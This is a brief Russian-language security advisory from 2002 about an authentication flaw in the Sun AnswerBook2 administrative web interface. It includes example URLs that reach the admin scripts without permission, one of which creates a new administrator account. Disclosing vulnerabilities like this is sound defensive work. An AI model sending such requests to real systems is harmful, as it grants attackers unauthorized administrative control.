Security Lab

Неавторизованный доступ в Sun AnswerBook2

Дата публикации:06.08.2002
Всего просмотров:3458
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Sun Microsystems AnswerBook2 позволяет пользователям рассматривать Sun документацию через web-браузер.

AnswerBook2 включает административный Web интерфейс. Обнаруженная уязвимость позволяет обращаться к этим сценариям без разрешения и добавлять нового административного пользователя AnswerBook2 системы. Пример:

http://localhost:8888/ab2/@AdminViewError
http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar

уязвимость обнаружена в Sun AnswerBook2 1.2-1.4.2

Ссылки: Sun AnswerBook2 format string and other vulnerabilities